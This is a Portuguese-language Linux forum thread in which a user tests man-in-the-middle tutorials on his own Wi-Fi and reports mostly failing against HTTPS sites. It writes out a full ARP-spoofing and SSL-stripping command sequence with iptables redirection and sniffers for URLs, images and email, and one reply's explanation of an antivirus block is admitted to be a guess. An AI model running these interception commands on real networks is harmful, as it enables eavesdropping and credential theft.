Ataques Man-in-the-Midle [RESOLVIDO]

Luciano_chagas
(usa Debian)

Enviado em 09/11/2016 - 18:01h

Resolvi testar algumas "receita de bolo" que tenho visto em sites e no youtube sobre mitm. Todas com eficiência de 100% em ambientes controlados (maquina virtual e etc). Resolvi testar na pratica estes tutoriais e não obtive resultados satisfatórios.
Os testes ocorreram da seguinte maneira:
Notebook atacante com Kali Linux 2.0
Notebook alvo com windows 7 e antivirus avast.
O ambiente foi na minha própria rede wifi.
1° Teste:
SSLstrip e Arpspoof:
Sintaxe:
Terminal 01:
# echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
#sslstrip -a -l 10000
Terminal 02:
#arpspoof -i wlan0 -t ipdoalvo ipdogateway
Terminal 03:
#tail -f sslstrip.log (para ver em tempo real a saida do sslstrip, nada que tivesse nexo)
Terminal 04:
#driftnet -i wlan0 (para visualizar imagens)
Terminal 05:
#urlsnarf -i wlan0 (para visualizar url acessadas)
Terminal 06:
#mailsnarf -i wlan0 (visualizar emails)

Foram acessados através do FIREFOX e GOOGLE CHROME os seguintes sites:
www.g1.com (apareceu as imagens e url)
www.facebook.com (não apareceu nada: imagens,url, login)
www.yahoo.com/mail (nada também)
www.gmail.com (nada também)
youtube.com (nada também)

Somente funcionou para sites comuns ( de noticias, blogs e etc)
Quando o mesmo experimento foi conduzido com sslstrip e ettercap (em substituição ao arpspoof) tanto no modo grafico como no modo texto. O avast bloqueou imediatamente o acesso aos sites pelos referidos navegadores.
Por favor aguardo comentários de pessoas que realmente tenham conhecimento em segurança de redes.

ctw6av
(usa Nenhuma)

Enviado em 09/11/2016 - 20:11h

Não tenho mais vou comentar, alguém garantiu que funcionaria? Entende o SSL? Entende o ARP?

Não me leve a mal, é só para saber oque você quer saber?


______________________________________________________________________
OS: Kali Linux kali-rolling kali-rolling
Kernel: x86_64 Linux 4.6.0-kali1-amd64
Resolution: 2390x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB

Luciano_chagas
(usa Debian)

Enviado em 09/11/2016 - 20:23h

ctw6av
(usa Nenhuma)

Enviado em 09/11/2016 - 21:31h

Rapaz... não entrarei em detalhes sobre o TLS/SSL por quê o assunto é muito extenso, mas, posso te dizer que a maioria desses "ataques", digo quando praticados por pessoas (não eu) que sabem oque e como estão fazendo, funcionam da seguinte forma:

1° A rede é invadida, quando digo rede não me refiro somente a wireless.
2° É aberto alguma forma de gerenciamento como ssh, telnet ou a famosa shell.
3° Após o 2° passo, fica fácil mudar as regras do firewall redirecionando e modificando o tráfego e derrubando as regras de proteção

Eu se fosse usar, faria dessa forma, não chegaria e jogaria um sniffer na rede e esperaria os resultados. Mas isso sou eu!

Uma coisa que já posso te dizer logo de cara é que o bloqueio do avast DEVE ter se dado ao fato da porta 10000 e não as default 8080/443 isso já é um alarde para o assustado avast e o chrome que não gosta de ninguém além dele espionando os usuários kkkkkk



______________________________________________________________________
OS: Kali Linux kali-rolling kali-rolling
Kernel: x86_64 Linux 4.6.0-kali1-amd64
Resolution: 2390x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB

removido
(usa Nenhuma)

Enviado em 09/11/2016 - 22:08h

É meio teórico, mas um caminho é dar uma espiada nas RFCs.

https://pt.wikipedia.org/wiki/Request_for_Comments

No link acima explica o que são.

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

ctw6av
(usa Nenhuma)

Enviado em 10/11/2016 - 00:53h

^Melhor resposta.

É uma ótima dica, eu sempre procuro as RFC's quando tenho alguma dúvida ou quero realmente aprender algo, pois, é quem entende e cria que escreve, sendo assim, se torna um conteúdo de grande vália para quem quer aprender.


______________________________________________________________________
OS: Biebian
Kernel: x86_64 3.5.2-amd64
Resolution: 1320x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB
Distro: http://biebian.sourceforge.net/

Luciano_chagas
(usa Debian)

Enviado em 10/11/2016 - 10:50h

Luciano_chagas
(usa Debian)

Enviado em 10/11/2016 - 14:36h

Bom! Vou dar por encerrado o tópico. Meu objetivo era saber se estes tutorias sobre mitm divulgados intensamente em vários canais do youtube e sites pela internet realmente teriam alguma eficiência tal como são divulgados. A conclusão que cheguei é que em ambiente simulado (maquina virtual) funciona, mais na pratica não! Um pc com firewall bem configurado e um bom antivirus são resistentes aos pseudos "hackers de youtube". Tenho uma rede domestica (familiar) com 32 dispositivos conectados e na familia tem alguns pentelhos que vivem estudando estes tutoriais de youtube pra querer bagunçar na rede.
Obrigado a todos que comentaram.

ctw6av
(usa Nenhuma)

Enviado em 10/11/2016 - 19:18h

As vezes nem isso foi amigo, eu chutei essa, não tenho conhecimento algum para afirmar isso.



______________________________________________________________________
OS: Biebian
Kernel: x86_64 3.5.2-amd64
Resolution: 1320x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB
Distro: http://biebian.sourceforge.net/